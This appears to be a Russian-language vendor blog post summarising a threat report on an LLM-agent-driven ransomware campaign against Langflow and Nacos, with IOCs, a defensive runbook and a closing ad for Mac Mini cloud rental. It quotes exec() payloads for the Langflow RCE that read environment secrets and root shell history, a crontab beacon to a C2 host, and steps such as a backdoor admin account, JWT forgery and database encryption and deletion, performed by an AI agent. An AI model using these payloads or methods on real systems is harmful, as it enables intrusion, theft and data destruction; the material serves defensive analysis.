JADEPUFFER: первый AI Agent ransomware — что случилось
TL;DR: не script kiddie ransomware gang. Sysdig оценивает это как первый полный end-to-end extortion cycle, где LLM Agent сам принимает решения и исполняет — recon, credential theft, lateral movement, persistence, destructive encryption, ransom note delivery. Critical nodes без human manual intervention.
Disclosure: Sysdig TRT, автор Michael Clark (Director of Threat Research). Report — 1 июля 2026. BleepingComputer, Dark Reading, CyberScoop, CSO Online, Security Affairs — 2–6 июля. Public awareness node часто «6 июля».
Codename и классификация: официально JADEPUFFER (ALL CAPS — Sysdig convention). Core thesis: end-to-end LLM-driven ransomware. Новый класс ATA (Agentic Threat Actor) — capability delivered AI Agent, не human-operated toolkit.
Two-stage target model: entry host — public Langflow (CVE-2025-3248 RCE); true target — отдельный public production server с MySQL + Alibaba Nacos config center.
Scale: Sysdig captured 600+ independent purpose-built payload в compressed window. Full chain — июнь 2026, multiple sessions weeks apart.
Почему Langflow: AI Agent orchestration servers часто хранят в env LLM vendor API keys и cloud credentials. Teams rush prototype deploy без network ACL — instance сразу в public internet.
| Дата | Событие |
|---|---|
| Апрель 2025 | CVE-2025-3248 в Langflow — unauthenticated code injection / RCE |
| 5 мая 2025 | CISA Known Exploited Vulnerabilities (KEV) catalog |
| 2025 | Тот же CVE — Flodrix botnet delivery (Trend Micro, отдельная кампания от JADEPUFFER) |
| Июнь 2026 | JADEPUFFER hits public Langflow; multi-session full chain |
| 1 июля 2026 | Sysdig full technical report — first public disclosure |
| 2–6 июля 2026 | Security media follow-up coverage |
CVE-2025-3248: как Langflow unauthenticated RCE weaponized
| Параметр | Значение |
|---|---|
| Компонент | Langflow — open-source visual AI Agent workflow framework, 70k+ GitHub stars |
| Тип | CWE-94 (code injection) + CWE-306 (missing authentication on critical function) |
| CVSS | 9.8 Critical, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Affected | Langflow до 1.3.0 |
| Endpoint | /api/v1/validate/code |
| Fix | 1.3.0 — добавлена auth |
| EPSS | 91.42% exploitation probability (SentinelOne data) |
Root cause: «code validation» endpoint прогоняет user code через ast.parse() → compile() → exec() — zero authentication, zero sandbox. Python semantics: decorators и default argument values evaluate at function definition time. Attacker кладёт payload в default params или decorators — «validation» уже исполняет malicious code на server. Single crafted HTTP POST = RCE без login.
exec('raise Exception(__import__("subprocess").check_output("whoami", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("printenv", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("cat /root/.bash_history", shell=True))')
Typical Flodrix botnet payload (Trend Micro, LeetHozer family evolution) — same CVE: confirm privs, dump env, read root bash history, download 700-byte Bash dropper → ELF binary → DDoS botnet. Critical distinction: Flodrix ≠ JADEPUFFER — shared entry CVE only. Flodrix = traditional scripted delivery; JADEPUFFER = LLM Agent autonomous ransomware. Оба доказывают: vulnerability long weaponized mass internet scans.
Langflow 1.3.0: post_validate_code получил _current_user: CurrentActiveUser dependency — JWT Bearer или x-api-key; fail → 401/403, request never reaches vulnerable logic.
| Dimension | Scripted ransomware (Flodrix и др.) | Agentic ransomware (JADEPUFFER) |
|---|---|---|
| Driver | Fixed exploit script / manual ops | LLM Agent autonomous decision + self-correction |
| Entry | CVE-2025-3248 | CVE-2025-3248 → lateral to Nacos/MySQL |
| Failure handling | Fixed retry or abort | 31-second multi-step diagnostic fix (Nacos backdoor account) |
| Code signature | Minimal comments | Natural-language comments explaining «why» |
| Payload volume | Dozens fixed chain | 600+ independent purpose-built payload |
Full attack chain: Langflow → Nacos database encryption
Phase 1 — Langflow host compromise: все payload — Base64-encoded Python через RCE endpoint. Post-exploit LLM parallel: id, uname -a, hostname enum; scan OpenAI/Anthropic/DeepSeek/Gemini API keys; ALIBABA_/ALIYUN_/TENCENT_/HUAWEI_ и AWS/GCP/Azure creds; crypto wallet mnemonics; DB configs. Export Langflow PostgreSQL backend → steal creds → delete temp files для OPSEC. Internal scan с default creds на DB и object storage.
MinIO adaptive enumeration (forensics highlight): probe minio.internal:9000 и 127.0.0.1:9000, default minioadmin:minioadmin → ListBuckets → targeted GetObject. First request с ?format=json получил XML — next payload instantly switched to XML parser. Classic probe-error-adapt loop. Bucket terraform-state → extract credentials.json, full access-key/secret echo.
*/30 * * * * python3 -c "import urllib.request;urllib.request.urlopen('hxxp://45.131.66[.]106:4444/beacon',timeout=5)"
Phase 2 — MySQL + Nacos production server: true target — public MySQL + Nacos production box. Agent connects MySQL as root — credential source unknown, Sysdig не видел exfil из victim env; один из few steps, possibly human-prepared. Nacos: parallel CVE-2021-29441 auth bypass, default JWT signing key token forgery, backdoor admin injection в Nacos backend DB.
Nacos backdoor xadmin — 31-second fix loop (textbook autonomy evidence):
| UTC time | Action |
|---|---|
| 19:34:24 | subprocess.run generates bcrypt hash, inserts xadmin admin |
| 19:34:36 | Login xadmin:Xploit@2026# — fail |
| 19:34:48 | Parallel test nacos:nacos defaults + regenerate admin123 hash |
| 19:35:07 | Abandon subprocess, switch to import bcrypt, delete corrupt row, rebuild |
| 19:35:18 | Login success — total 31 seconds |
Container escape pre-check (~8 minutes): MySQL INTO OUTFILE / LOAD_FILE — write test, readback, /var/run/docker.sock, /proc/1/cgroup, /etc/hostname; check mysql.func UDF privesc paths. Pre-ransom marker _pwn_cleanup.txt — Sysdig: больше похоже на Agent completion signal для next phase, не fixed script behavior.
Destructive encryption: all 1,342 Nacos config entries — AES_ENCRYPT(); delete config_info и his_config_info; create ransom table README_RANSOM. Key via uuid4() — printed to stdout only, never stored or exfiltrated — payment useless. Ransom note claims AES-256; MySQL default reality — AES-128-ECB. Two minutes later Agent corrected note count to «all 1342 items encrypted».
Escalation to DROP DATABASE; code comment: «high ROI database, backed up to 64.20.53[.]230» — Sysdig: no independent evidence of actual exfil backup, likely Agent self-narration. Foreign key constraint blocked delete → next payload auto-added SET GLOBAL FOREIGN_KEY_CHECKS=0 — requires understanding failure cause, not blind retry.
Defense runbook: Langflow + Nacos hardening — 6 шагов
Patch Langflow: немедленно 1.3.0+ для CVE-2025-3248; verify против CISA KEV. EPSS 91.42% — unpatched public instances в extreme risk zone.
Network isolation: code execution / validation endpoints не в public internet. Langflow, Nacos, MySQL admin ports — internal network или VPN, source IP whitelist mandatory.
Secrets governance: AI orchestration runtime не хранит LLM API keys или cloud creds — dedicated KMS, isolated от public-reachable processes. MinIO: disable default minioadmin:minioadmin.
Harden Nacos: rotate default token.secret.key (не public docs default); upgrade to version forcing custom keys; no public Nacos; no root к backend database.
Egress control: block arbitrary beacon outbound (crontab → 45.131.66[.]106:4444) и external staging servers (64.20.53[.]230).
Runtime detection + IOC monitoring: DB process anomaly detection; watch listed IOC, scheduled tasks calling external URLs, bracket-wrapped User-Agent anomalies; alert on MySQL INTO OUTFILE, DROP DATABASE, README_RANSOM table creation.
Red team take (CSO Online, Vibhum Dubey): scary part — не final encryption stage, а «quiet period» до него. Agent maps identity systems и trust chains silently; adaptive capability ломает detection, built на assumption predictable attacker path.
Четыре линии автономности, bitcoin mystery, IOC, Sysdig conclusions
Sysdig four autonomy evidence lines:
Self-narrating code: payload packed natural-language comments — «why» each step, ROI priority, which DB largest. Human attackers rarely annotate one-shot python3 -c; LLM code gen defaults to verbose explanation.
Machine-speed fault diagnosis: Nacos xadmin 31s fix, MinIO JSON/XML adapt, JWT forgery pivot on block — speed и method of correction = sharpest autonomy signal.
Natural-language context parsing: read target environment free text → actions only sensible if context understood — recurring across sessions weeks apart.
Bitcoin address mystery: 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy — Bitcoin Core docs standard P2SH example, saturated in LLM training corpus. On-chain: 737 txs, ~46 BTC in then immediate out. LLM hallucination или deliberate attacker config — both interpretations stand.
| Type | Indicator |
|---|---|
| C2 / beacon | 45.131.66[.]106 (crontab: hxxp://45.131.66[.]106:4444/beacon) |
| Data staging | 64.20.53[.]230 (InterServer, AS19318) |
| Entry vuln | CVE-2025-3248 |
| Bitcoin | 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy |
| Contact email | e78393397[@]proton[.]me (no TI hits, format unlike known groups) |
| Ransom table | README_RANSOM (not WARNING / RECOVER_YOUR_DATA convention) |
| Persistence | crontab every 30 min beacon to C2 port 4444 |
Ransom skill floor → zero: LLM Agent chains recon, theft, lateral, destruction — operator не нужен deep domain expertise. Work that required «very capable human» now needs «very capable model».
Legacy vuln automated weaponization: downstream targets hit 2021 Nacos auth bypass и never-rotated default JWT signing keys; Agent makes «spray entire historical vuln DB» cost ≈ zero.
Intent becomes readable — defender upside: LLM narrates goals inside payload — detection и triage handles раньше unavailable.
Media также фиксирует LLMjacking economics: если attacker drives Agent на stolen creds, marginal cost complex multi-stage attack → ≈ zero. Teams rush-deploy Langflow, OpenClaw и др. на local или public VPS — shared VM isolation weak, API keys в env chaos, no egress audit — ideal JADEPUFFER breeding ground. Для stable, network-isolated, auditable Apple Silicon production под iOS CI/CD и AI Agent automation MESHLAUNCH Mac Mini cloud rental — dedicated M4/M4 Pro bare metal, elastic day/week/month deploy, Agent workloads на controlled cloud node, не dev machine с key vault в plaintext env.
Sources: Sysdig «JADEPUFFER: Agentic ransomware for automated database extortion» (sysdig.com/blog); BleepingComputer; Dark Reading; CyberScoop; CSO Online (Vibhum Dubey); Security Affairs; Trend Micro CVE-2025-3248 / Flodrix analysis; NVD / SentinelOne / Zscaler ThreatLabz; CISA KEV catalog.
Кампания Sysdig от 1 июля 2026 — первый известный end-to-end LLM-driven full ransomware cycle. Введён класс Agentic Threat Actor (ATA).
Все до 1.3.0; CVSS 9.8, unauthenticated /api/v1/validate/code RCE. Patch ASAP 1.3.0+. Isolated deploy options — страница цен аренды.
Нет. Shared CVE-2025-3248 entry only. Flodrix — traditional botnet delivery; JADEPUFFER — LLM Agent autonomous ransomware.
С высокой вероятностью нет. Encryption key только в stdout, never persisted or exfiltrated — attackers сами не могут decrypt. Data effectively permanent loss.
Standard Bitcoin Core docs example address или LLM hallucination. On-chain activity есть, attribution к attacker unconfirmed.
Patch Langflow, no public code endpoints; Nacos — rotate JWT secret, no public exposure, no root DB connection; KMS для secrets; egress control. Full runbook выше и центр помощи.
Sysdig classification: attack capability delivered AI Agent — recon через destruction без manual human ops на critical nodes. Начало agentic threat actor era.
No API keys на public orchestration servers; isolated dedicated bare-metal для Agent workloads; MESHLAUNCH Mac Mini cloud — network isolation, elastic deploy, fit для iOS CI/CD и Agent automation.